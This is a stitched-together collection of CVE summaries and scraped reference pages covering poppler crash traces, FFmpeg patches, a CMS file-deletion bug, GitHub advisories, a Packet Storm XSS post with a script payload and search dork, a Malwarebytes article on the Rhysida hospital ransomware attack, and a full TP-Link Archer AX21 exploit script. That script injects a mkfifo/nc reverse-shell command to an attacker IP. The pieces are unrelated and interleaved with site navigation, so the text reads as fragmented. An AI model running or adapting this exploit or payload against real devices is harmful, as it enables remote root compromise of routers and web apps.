An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::convertToType1 function.

299 } else {
 300 (*outputFunc)(outputStream, "256 array\n", 10);
 301 (*outputFunc)(outputStream, "0 1 255 {1 index exch /.notdef put} for\n", 40);
 302 enc = newEncoding ? newEncoding : (const char **)encoding;
 303 for (i = 0; i < 256; ++i) {
 → 304 if (enc[i]) { // enc == 0
 305 buf = GooString::format("dup {0:d} /{1:s} put\n", i, enc[i]);
 306 (*outputFunc)(outputStream, buf->c_str(), buf->getLength());
 307 delete buf;
 308 }
 309 }
 

enc == 0 in line 304.

 0x7c6e5d <FoFiType1C::convertToType1(char+0> shr rax, 0x3
 0x7c6e61 <FoFiType1C::convertToType1(char+0> cmp BYTE PTR [rax+0x7fff8000], 0x0
 0x7c6e68 <FoFiType1C::convertToType1(char+0> jne 0x7c9bfe <FoFiType1C::convertToType1(char const*, char const**, bool, void (*)(void*, char const*, int), void*)+17710>
 → 0x7c6e6e <FoFiType1C::convertToType1(char+0> mov rdx, QWORD PTR [r15]
 0x7c6e71 <FoFiType1C::convertToType1(char+0> test rdx, rdx
 0x7c6e74 <FoFiType1C::convertToType1(char+0> je 0x7c6df8 <FoFiType1C::convertToType1(char const*, char const**, bool, void (*)(void*, char const*, int), void*)+5928>
 0x7c6e76 <FoFiType1C::convertToType1(char+0> mov rax, QWORD PTR [rip+0x926943] # 0x10ed7c0 <__afl_area_ptr>
 0x7c6e7d <FoFiType1C::convertToType1(char+0> add BYTE PTR [rax+0x4f23], 0x1
 0x7c6e84 <FoFiType1C::convertToType1(char+0> mov DWORD PTR fs:[r13+0x0], 0x245f
 
 
 gef➤ print $r15
 $7 = 0x0

 [#0] 0x7c6e6e → FoFiType1C::convertToType1(this=<optimized out>, psName=0x603000019360 "ERGTBC+#3ceoSansIntel", newEncoding=<optimized out>, ascii=<optimized out>, outputFunc=<optimized out>, outputStream=<optimized out>)
 [#1] 0x6346ca → PSOutputDev::setupEmbeddedType1CFont(this=0x619000000f80, font=<optimized out>, id=<optimized out>, psName=<optimized out>)
 [#2] 0x629553 → PSOutputDev::setupFont(this=0x619000000f80, font=<optimized out>, parentResDict=<optimized out>)
 [#3] 0x62630c → PSOutputDev::setupFonts(this=<optimized out>, resDict=0x6070000020f0)
 [#4] 0x622f01 → PSOutputDev::setupResources(this=0x619000000f80, resDict=0x6070000020f0)
 [#5] 0x61da18 → PSOutputDev::writeDocSetup(this=0x619000000f80, catalog=<optimized out>, pageList=<optimized out>, duplexA=<optimized out>)
 [#6] 0x6195db → PSOutputDev::postInit(this=0x619000000f80)
 [#7] 0x6406e9 → PSOutputDev::checkPageSlice(this=<optimized out>, page=<optimized out>, rotateA=<optimized out>, useMediaBox=<optimized out>, crop=0x1, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>)
 [#8] 0xa31aad → Page::displaySlice(this=<optimized out>, out=0x619000000f80, hDPI=<optimized out>, vDPI=<optimized out>, rotate=<optimized out>, useMediaBox=<optimized out>, crop=<optimized out>, sliceX=<optimized out>, sliceY=<optimized out>, sliceW=<optimized out>, sliceH=<optimized out>, printing=<optimized out>, abortCheckCbk=<optimized out>, abortCheckCbkData=<optimized out>, annotDisplayDecideCbk=<optimized out>, annotDisplayDecideCbkData=<optimized out>, copyXRef=<optimized out>)
 [#9] 0xa31944 → Page::display(this=0x61a0000006a0, out=0x14, hDPI=1.5817496953307363e-153, vDPI=9.041152192150418e+271, rotate=0x0, useMediaBox=0x0, crop=0x0, printing=<optimized out>, abortCheckCbk=0x0, abortCheckCbkData=0x0, annotDisplayDecideCbk=0x0, annotDisplayDecideCbkData=0x0, copyXRef=<optimized out>)

CVE-2020-36024: NULL-Pointer Deference in `FoFiType1C::convertToType1` (#1016) · Issues · poppler / poppler · GitLab

An issue was discovered in freedesktop poppler version 20.12.1, allows remote attackers to cause a denial of service (DoS) via crafted .pdf file to FoFiType1C::cvtGlyph function.

    ==107470==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc5f160fd8 (pc 0x0000004ded5c bp 0x7ffc5f161850 sp 0x7ffc5f160fe0 T0)
        #0 0x4ded5b in __asan_memcpy (/src/poppler_test/build/utils/pdftops+0x4ded5b)
        #1 0x817158 in FoFiType1C::getOp(int, bool, bool*) /src/poppler_test/fofi/FoFiType1C.cc:2620:21
        #2 0x8077bd in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc:1141:15
        #3 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #4 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #5 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #6 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #7 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #8 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #9 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #10 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #11 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #12 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #13 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #14 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #15 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #16 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #17 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #18 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #19 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #20 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #21 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #22 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #23 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #24 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #25 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #26 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #27 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #28 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #29 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #30 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #31 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #32 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #33 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #34 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #35 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #36 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #37 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #38 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #39 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #40 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #41 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
        #42 0x80ad8d in FoFiType1C::cvtGlyph(int, int, GooString*, Type1CIndex const*, Type1CPrivateDict const*, bool) /src/poppler_test/fofi/FoFiType1C.cc
    ...
    ...

This cause segmentation fault without ASAN.

CVE-2020-36023: Stack-Overflow in `FoFiType1C::cvtGlyph` results in Segmentation Fault (#1013) · Issues · poppler / poppler · GitLab

An issue was discovered in decode_frame in libavcodec/tiff.c in FFmpeg version 4.3, allows remote attackers to cause a denial of service (DoS).

**\[FFmpeg-devel\] \[PATCH 7/7\] avcodec/tiff: Disallow striped and tiled tiffs except for DNG****Michael Niedermayer** michael at niedermayer.cc 
_Fri Nov 6 01:11:10 EET 2020_

* Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
* Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
* **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

strips + tiles is not allowed in TIFF
DNG uses a separate codepath

Regression since da5b3d002862d1e105002a6dc1567e6551860896.

Fixes: NULL pointer dereference
Fixes: poc1

Found-by: 1vanChen of NSFOCUS Security Team
Signed-off-by: Michael Niedermayer <michael at niedermayer.cc\>
---
 libavcodec/tiff.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/libavcodec/tiff.c b/libavcodec/tiff.c
index 2e45464218..00f0c0ccf7 100644
--- a/libavcodec/tiff.c
+++ b/libavcodec/tiff.c
@@ -1923,14 +1923,17 @@ again:
 has\_strip\_bits = s->strippos || s->strips || s->stripoff || s->rps || s->sot || s->sstype || s->stripsize || s->stripsizesoff;
 
 if (has\_tile\_bits && has\_strip\_bits) {
- av\_log(avctx, AV\_LOG\_WARNING, "Tiled TIFF is not allowed to strip\\n");
+ int tiled\_dng = s->is\_tiled && is\_dng;
+ av\_log(avctx, tiled\_dng ? AV\_LOG\_WARNING : AV\_LOG\_ERROR, "Tiled TIFF is not allowed to strip\\n");
+ if (!tiled\_dng)
+ return AVERROR\_INVALIDDATA;
 }
 
 /\* now we have the data and may start decoding \*/
 if ((ret = init\_image(s, &frame)) < 0)
 return ret;
 
- if (!s->is\_tiled) {
+ if (!s->is\_tiled || has\_strip\_bits) {
 if (s->strips == 1 && !s->stripsize) {
 av\_log(avctx, AV\_LOG\_WARNING, "Image data size missing\\n");
 s->stripsize = avpkt->size - s->stripoff;
-- 
2.17.1

* Previous message (by thread): \[FFmpeg-devel\] \[PATCH 6/7\] avcodec/h264idct\_template: Fix integer overflow in ff\_h264\_chroma422\_dc\_dequant\_idct()
* Next message (by thread): \[FFmpeg-devel\] \[PATCH\] Moves yuv2yuvX\_sse3 to yasm, unrolls main loop and other small optimizations for ~20% speedup.
* **Messages sorted by:** \[ date \] \[ thread \] \[ subject \] \[ author \]

More information about the ffmpeg-devel mailing list

CVE-2020-36138: Disallow striped and tiled tiffs except for DNG

An issue was discovered in pcmt superMicro-CMS version 3.11, allows attackers to delete files via crafted image file in images.php.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

gift89a opened this issue

Jan 14, 2021

· 2 comments

Closed

**Arbitrary file deletion vulnerability #1**

gift89a opened this issue

Jan 14, 2021

· 2 comments

**Comments**

**Vulnerability exploitation conditions: Log in to the management background**

Vulnerable code: superMicro-CMS-main/admin/images.php line:151

\` if (array\_key\_exists('submit2', $\_POST)) { // Delete

 	$imagename = trim($_POST['delete']);
 	$delete = '../img/' . $imagename; //**$imagename, User controllable parameters**
 	// $disallowed = array('img-loading.gif', 'nav-icon.jpg');
 
 	if (strlen($imagename) < 1) {
 		$problem = TRUE;
 		$response = 'No image filename was entered.';
 	}
 
 	// Admin images moved to admin
 
 	if (($imagename == 'og.jpg') || ($imagename == 'bg_footer.gif') || ($imagename == 'bg_footer_monochrome.gif')) {
 		$problem = TRUE;
 		$response = "The default images can't be deleted. Maybe upload a new one (og.jpg must be 200 pixels square).";
 	}
 
 	if (!$problem) {
 		if (file_exists($delete)) {
 			unlink($delete); //**Unfiltered, can directly all files**
 			$response = 'Success. ' . $imagename . ' was deleted.';
 		} else {
 			$response = 'Image ' . $imagename . ' doesn\'t exist. Try another.';
 		}
 	}
 }`
 

Vulnerability POC：

Thanks for that too. Will do it.

Changes made. Thanks again.

2 participants

CVE-2021-25856: Arbitrary file deletion vulnerability · Issue #1 · pcmt/superMicro-CMS

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5, a data submessage sent to PDP port raises unhandled `BadParamException` in fastcdr, which in turn crashes fastdds. Versions 2.11.0, 2.10.2, 2.9.2, and 2.6.5 contain a patch for this issue.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-39945: Fast-CDR/src/cpp/Cdr.cpp at v1.0.26 · eProsima/Fast-CDR

Integer overflow vulnerability in av_timecode_make_string in libavutil/timecode.c in FFmpeg version 4.3.2, allows local attackers to cause a denial of service (DoS) via crafted .mov file.

author

Michael Niedermayer <michael@niedermayer.cc>

Mon, 1 Mar 2021 12:44:12 +0000 (13:44 +0100)

committer

Michael Niedermayer <michael@niedermayer.cc>

Sun, 14 Mar 2021 22:29:51 +0000 (23:29 +0100)

Fixes: Integer overflow and division by 0 
Fixes: poc-202102-div.mov

Found-by: 1vanChen of NSFOCUS Security Team 
Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>

 

index b1b504edbf601d8cd59effa71b2edf97791aa0e6..2fc3295e25dedc328a2943673b7c8734570516c1 100644 (file) 

@@ \-114,8 +114,8 @@ char \*av\_timecode\_make\_string(const AVTimecode \*tc, char \*buf, int framenum)

     }

     ff = framenum % fps;

     ss = framenum / fps        % 60;

\-    mm = framenum / (fps\*60)   % 60;

\-    hh = framenum / (fps\*3600);

+    mm = framenum / (fps\*60LL) % 60;

+    hh = framenum / (fps\*3600LL);

     if (tc->flags & AV\_TIMECODE\_FLAG\_24HOURSMAX)

         hh = hh % 24;

     snprintf(buf, AV\_TIMECODE\_STR\_SIZE, "%s%02d:%02d:%02d%c%02d",

CVE-2021-28429: git.ffmpeg.org Git - ffmpeg.git/commitdiff

TP-Link Archer AX21 suffers from an unauthenticated remote command injection vulnerability.

    #!/usr/bin/python3# # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection# Date: 07/25/2023# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)# Vendor Homepage: https://www.tp-link.com/us/# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0# CVE: CVE-2023-1389## Disclaimer: This script is intended to be used for educational purposes only.# Do not run this against any system that you do not have permission to test. # The author will not be held responsible for any use or damage caused by this # program. # # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the# *country* parameter of the *write* callback for the *country* form at the # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is # possible to run commands as root. Execution requires sending the request twice;# the first request sets the command in the *country* value, and the second request # (which can be identical or not) executes it. # # This script is a short proof of concept to obtain a reverse shell. To read more # about the development of this script, you can read the blog post here:# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94# Before running the script, start a nc listener on your preferred port -> run the script -> profitimport requests, urllib.parse, argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning# Suppress warning for connecting to a router with a self-signed certificaterequests.packages.urllib3.disable_warnings(InsecureRequestWarning)# Take user input for the router IP, and attacker IP and portparser = argparse.ArgumentParser()parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")args = parser.parse_args()# Generate the reverse shell command with the attacker IP and portrevshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")# URL to obtain the reverse shellurl_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"# Send the URL twice to run the command. Sending twice is necessary for the attackr = requests.get(url_command, verify=False)r = requests.get(url_command, verify=False)

TP-Link Archer AX21 Command Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

 ====================================================================================================================================| # Title : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | | # Vendor : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2 | | # Dork : "Copyright © DigaSell All Rights Reserved." |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2 [+] Panel : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================

**File Tags**

* ActiveX (932)
* Advisory (81,933)
* Arbitrary (16,196)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,277)
* Conference (679)
* Cracker (841)
* CSRF (3,344)
* DoS (23,416)
* Encryption (2,370)
* Exploit (51,861)
* File Inclusion (4,221)
* File Upload (973)
* Firewall (821)
* Info Disclosure (2,770)
* Intrusion Detection (892)
* Java (3,043)
* JavaScript (858)
* Kernel (6,671)
* Local (14,448)
* Magazine (586)
* Overflow (12,691)
* Perl (1,423)
* PHP (5,145)
* Proof of Concept (2,338)
* Protocol (3,601)
* Python (1,535)
* Remote (30,765)
* Root (3,581)
* Rootkit (508)
* Ruby (612)
* Scanner (1,639)
* Security Tool (7,886)
* Shell (3,180)
* Shellcode (1,214)
* Sniffer (894)
* Spoof (2,206)
* SQL Injection (16,366)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (664)
* Vulnerability (31,770)
* Web (9,663)
* Whitepaper (3,749)
* x86 (962)
* XSS (17,932)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,922)
* Debian (6,812)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,428)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,711)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,808)
* UNIX (9,289)
* UnixWare (186)
* Windows (6,573)
* Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Categories: News
Tags: hospital

Tags:  healthcare

Tags:  ransomware

Tags:  hijack

Tags:  network

Tags:  compromise

Tags:  data

Tags:  ambulance

Tags:  service

Tags:  redirect

A widespread ransomware attack affecting 16 hospitals last week has led to ongoing cleanup efforts.



(Read more...)




The post Several hospitals still counting the cost of widespread ransomware attack appeared first on Malwarebytes Labs.

The 16 hospitals struck down by ransomware last week are still dealing with the fallout from the attack. The healthcare facilities located in Connecticut, Pennsylvania, Rhode island, and California had the ransomware attack confirmed by the FBI. Issues started to emerge last Thursday with patients diverted to other locations and some operations put on hold.

The AP reported that staff were forced to resort to pen and paper and manually running records to different departments. When dealing with potentially critical health issues, every second counts, and this is especially the case where so much critical healthcare equipment is reliant on networks and interconnected digital systems.

A recent Facebook update from Waterbury Hospital, CT reads as follows:

> Our computer systems continue to be down throughout the network. We are following downtime procedures including the use of paper records. The outage has affected some of our outpatient services, mostly diagnostic imaging and blood draw and some patient appointments. We have contacted and will continue to contact any affected patients. 

The post also states that a diagnostic radiology department is affected.

At the time of the attack, no ransomware group had claimed responsibility for the network breach. Now, according to The Record, several sources told Recorded Future News that the ransomware group behind this widespread attack is Rhysida. It’s standard practice that law enforcement will not comment on a ransomware group directly while an investigation is taking place.

What’s interesting given the alleged claims from sources is that the US Department of Health and Human Services recently published a warning to hospitals last week about this specific group. The document said about Rhysida:

> Rhysida is a new ransomware-as-a-service (RaaS) group that has emerged since May 2023. The group drops an eponymous ransomware via phishing attacks and Cobalt Strike to breach targets’ networks and deploy their payloads. The group threatens to publicly distribute the exfiltrated data if the ransom is not paid. Rhysida is still in early stages of development, as indicated by the lack of advanced features and the program name Rhysida-0.1.
> 
> The ransomware also leaves PDF notes on the affected folders, instructing the victims to contact the group via their portal and pay in Bitcoin. Its victims are distributed throughout several countries across Western Europe, North and South America, and Australia. They primarily attack education, government, manufacturing, and technology and managed service provider sectors; however, there has been recent attacks against the Healthcare and Public Health (HPH) sector. 

The HHS notes that the ransomware is relatively new. When it first made an appearance on our Ransomware Review in July of this year, we said the following:

> Rhysida, a new ransomware gang claiming to be a "cybersecurity team," has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army. 
> 
> The gang published a whopping eighteen victims on their leak site in June, making it one of the most prolific newcomers in our month reviews to-date.

In terms of how Rhysia spreads, the primary methods of infection include phishing attacks, and dropping payloads across compromised systems once Cobalt Strike or other command and control frameworks are in place. Once the ransomware has taken hold, the group uses tried and tested double threat extortion tactics. A ransom note threatens to distribute stolen data publicly unless the ransom is paid.

The threat isn’t “just” locked computers, or patients unable to be assisted. There’s the very real possibility of said patients having their medical or other personal data thrown online for all to see.

Some ransomware groups won’t touch medical attacks for fear of reprisals. On many occasions where a medical facility or healthcare provider has been attacked, those responsible will apologise and provide free decryption tools. Others will do much the same thing alongside blaming rogue affiliates.

Certain attacks simply draw too much heat and generate waves of negative publicity for the culprits. If your entire gimmick is that you can (just about) be trusted to unlock PCs and return data if you receive a ransom, taking down hospitals will not encourage others to trust you.

All this leads to in the long term is a probable drop in ill-gotten gains, and you can bet the ransomware authors would prefer that to not be the case.

Hopefully, all of the impacted healthcare operations will be back up and running soon. We'd suggest anyone potentially affected keep in touch with their local hospital and pay attention to the updates page for more information.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Several hospitals still counting the cost of widespread ransomware attack

Mattermost fails to properly validate the requesting user permissions when updating a system admin, allowing a user manager to update a system admin's details such as email, first name and last name.



Skip to content

* * Actions
 
 Automate any workflow
 
 * Packages
 
 Host and manage packages
 
 * Security
 
 Find and fix vulnerabilities
 
 * Codespaces
 
 Instant dev environments
 
 * Copilot
 
 Write better code with AI
 
 * Code review
 
 Manage code changes
 
 * Issues
 
 Plan and track work
 
 * Discussions
 
 Collaborate outside of code
 
 

* * GitHub Sponsors
 
 Fund open source developers
 
 
 * The ReadME Project
 
 GitHub community articles
 
 
* Pricing

1. GitHub Advisory Database
2. GitHub Reviewed
3. CVE-2023-4107

**Mattermost does not validate requesting user permissions before updating admin details**

Moderate severity GitHub Reviewed Published Aug 11, 2023 to the GitHub Advisory Database • Updated Aug 11, 2023

**Package**

gomod github.com/mattermost/mattermost-server/v6 (Go)

**Affected versions**

<= 7.8.7

\>= 7.9.0, <= 7.9.5

\>= 7.10.0, <= 7.10.3

**Patched versions**

7.8.8

7.9.6

7.10.4

**Description**

Published to the GitHub Advisory Database

Aug 11, 2023

Last updated

Aug 11, 2023

Tag

#git